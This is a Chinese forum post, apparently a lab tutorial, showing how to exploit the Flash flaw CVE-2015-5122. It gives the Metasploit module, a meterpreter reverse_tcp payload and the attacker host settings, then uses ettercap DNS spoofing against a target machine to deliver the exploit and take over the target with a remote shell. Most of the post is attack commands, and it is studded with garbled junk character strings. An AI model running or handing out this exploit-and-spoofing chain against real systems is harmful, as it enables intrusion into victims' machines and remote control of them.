中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

0 v2 f3 |% F7 |7 Q 二、cve2015-5122漏洞实例演示虚拟机 1 t( F' M5 P1 [! c

& B- Z3 g9 v/ a/ ^# Y 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 6 d/ n7 M# d+ l5 A

7 L% ?8 l- |1 S search cve-2015-5122如图： + p8 P8 f: A/ Y5 i& j2 g

' u: l" q( ]& N. T' \+ L , g4 p# |2 ]3 R4 ?6 d* W8 V

, g2 r( ?# k8 F 下面我们敲如下命令： ! E% i/ D- f: ` S

. t. T9 ~$ g. w1 P' @ T use exploit/multi/browser/adobe_flash_opaque_background_uaf & J8 F8 o+ Y& k4 R: [

# {) x, I( x/ n( {9 R set PAYLOAD windows/meterpreter/reverse_tcp - P' h6 X" f2 ~* E8 u1 E

; c0 m" e, t7 ^4 B5 Q set LHOST 192.168.0.109 2 g/ A# c& m8 C4 p1 s5 U

4 W/ x) P: Z7 j7 t" B, ] set URIPATH / /*根目录*/ $ J( u3 z1 I; s) y

& T3 E: R4 ~5 \; j* L5 m set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 : l; f0 G; E7 v* X

" c! n4 n' A% ?9 A! D! n; k set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 4 i/ f! ^0 }" Y0 u8 f

8 q* T. H! Q' _7 T 然后show options如图： 9 L! I8 q9 Z. q, o* H$ N5 U

8 y7 U2 _4 \* m* ]+ O * A3 g, A+ I' @/ w6 p

3 R, B" ~4 K" B5 S6 K" ] 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
. ~1 z3 C4 ]" r; k/ ~) O! g0 B4 e0 v , k3 D/ v1 S' x7 B

( }& F5 z* O" R& `3 H 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 * [* k2 I, l6 ~' r p6 ?

: x' i4 Z' i5 n Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 6 g+ D9 n: u) Q0 L4 t% J

2 W$ ]. v: b, P5 ?" Y ! b+ d' N$ L* ^0 `. Q% M

( V3 J; [1 T& S S 成功了，这时候我们断开ettercap，如图： : N2 i. ]) ?6 p6 L7 _$ P

x/ G }$ R& y$ g) D5 I 9 X1 N% H' x C9 L( j# L B8 A

$ N1 |1 }0 x' O, q" W* n6 \ Screenshot如图： 5 G- x: o+ e3 r

; m" s1 m7 c9 T) W. i# P6 m 6 P3 p. G# ^" C5 R+ R' T

3 ?! o8 z: z. a! T# H; ? ! R' x0 j1 v, ~: [, ~

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)